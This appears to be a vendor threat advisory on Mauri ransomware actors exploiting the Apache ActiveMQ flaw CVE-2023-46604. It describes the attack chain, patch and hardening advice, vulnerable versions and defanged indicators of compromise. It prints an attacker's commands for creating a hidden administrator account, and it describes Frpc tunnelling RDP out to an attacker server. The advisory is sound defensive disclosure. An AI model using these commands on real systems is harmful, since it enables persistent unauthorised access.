AhnLab Security Intelligence Response Center (ASEC) researchers have discovered that the CVE-2023-46604 vulnerability in Apache ActiveMQ servers is being exploited on systems in Korea. This vulnerability enables remote code execution through the manipulation of serialized class types in the OpenWire protocol.
Overview
The vulnerability began being actively exploited shortly after its disclosure, with incidents linked to the Andariel group and HelloKitty ransomware. Unpatched systems have been continuously targeted, with attackers deploying tools such as Ladon, Netcat, AnyDesk, and z0Miner to compromise environments. Recently, ASEC has observed signs that Mauri ransomware threat actors are exploiting CVE-2023-46604, using Quasar RAT as part of the attack chain to exfiltrate data and gain control over systems via remote desktop. Although no confirmed Mauri ransomware attacks have been reported, ASEC notes that Mauri ransomware has been uploaded to the download server.
Intelligence reports have identified threat activity exploiting CVE-2023-46604 to facilitate HelloKitty ransomware attacks. The threat actor exploited the vulnerability to deliver and launch malicious MSI binaries using misexec.exe. The actor then tampered with system services and launched the ransomware. Incident response reports have also observed indicators of additional activity targeting ActiveMQ since late October 2023, though the exploitation method has not been confirmed.
Exploitation
The vulnerability is triggered when an attacker manipulates the serialized class type in the OpenWire protocol, which is used by Apache ActiveMQ to communicate with other systems. Here’s how the attack works:
- The attacker crafts a malicious packet with a modified class reference.
- The vulnerable Apache ActiveMQ server, upon receiving this packet, loads a class XML configuration file from a specified URL that is embedded in the packet.
- The server then executes commands specified in the XML file, which allows the attacker to execute arbitrary code and potentially take full control of the affected system.
This attack requires the Apache ActiveMQ server to be exposed externally (accessible from the internet) and unpatched against the vulnerability.
Attack Chain and Malware Installation
Initial Access: Attackers typically target systems running unpatched Apache ActiveMQ servers. These systems are scanned for the CVE-2023-46604 vulnerability.
Malicious Actions:
- Backdoor Account Creation: The first step for attackers is to create a backdoor account to maintain access. One example is the account “adminCaloX1”. The attacker uses commands like:sqlCopy code
net user adminCaloX1 CaloX@2580 /add net localgroup Administrators adminCaloX1 /addThese commands create a new user with administrative privileges and enable RDP access. - Frpc and RDP: The attacker then installs Frpc (Fast Reverse Proxy), an open-source tool used to bypass firewalls and expose systems that are behind NAT or firewalls. Frpc is installed using PowerShell commands, and it connects the infected system’s RDP port (3389) to an external server controlled by the attacker.
- RDP Access: Once the system is exposed using Frpc, the attacker can use the backdoor account to access the system remotely through RDP.
- Malware Deployment: The attackers also deploy other malware, such as Quasar RAT, a remote access trojan that provides the attacker with control over the infected system. Quasar RAT allows:
- Remote command execution.
- File and registry manipulation.
- Keylogging and the theft of account information.
Proxy Tools: The Frpc tool is a critical component of the attack, as it allows the attacker to establish an external connection to the infected system even if it is behind a firewall. This enables the attacker to access RDP or other services that would otherwise be inaccessible.
Ransomware: Although not directly confirmed, there is evidence that Mauri ransomware was also uploaded to the affected systems. Mauri ransomware is an open-source tool often used by cybercriminals to encrypt data and demand a ransom for its release. The presence of this ransomware on the download server suggests that it might be used in attacks, particularly given its widespread exploitation in previous attacks under different names, such as Mimus by the Mimo threat actor.
Recommendations
iProtect recommends the following mitigations to reduce the impact of this threat:
- Upgrade Affected Servers: Due to active attacks and the availability of exploitation details, organizations should immediately upgrade affected servers. Apache recommends upgrading ActiveMQ to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to address the issue.
- Review Logs and Alerts: Review logs and alerts for signs of exploitation or post-compromise activity on affected servers, such as malicious files dropped and executed via the msiexec.exe command. Note that upgrading ActiveMQ will not remove any attacker artifacts.
- Reset Credentials: If exploitation is detected, reset the credentials for accounts that have been used or logged onto the server. Also, rotate credentials for any service accounts related to ActiveMQ.
- Harden Servers: Follow Apache’s ActiveMQ security recommendations to harden servers. Enabling authentication for brokers can prevent an attacker from moving laterally to another broker without proper authentication.
Vulnerable Versions
Apache ActiveMQ servers running the following versions are vulnerable to CVE-2023-46604:
- Apache ActiveMQ versions 5.15.15 or earlier
- Versions 5.16.0 – 5.16.6
- Versions 5.17.0 – 5.17.5
- Versions 5.18.0 – 5.18.2
- Legacy OpenWire Module versions 5.15.15 and earlier
Indicators of Compromise
MD5 Hashes
07894bc946bd742cec694562e730bac8
25b1c94cf09076eb8ce590ee2f7f108e
2c93a213f08a9f31af0c7fc4566a0e56
2e8a3baeaa0fc85ed787a3c7dfd462e7
3b56e1881d8708c48150978da14da91e
URLs
http[:]//18[.]139[.]156[.]111[:]83/Google[.]zip
http[:]//18[.]139[.]156[.]111[:]83/a[.]exe
http[:]//18[.]139[.]156[.]111[:]83/brave[.]exe
http[:]//18[.]139[.]156[.]111[:]83/c[.]ini
http[:]//18[.]139[.]156[.]111[:]83/chrome[.]exe
IP
18[.]139[.]156[.]111
References
Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604).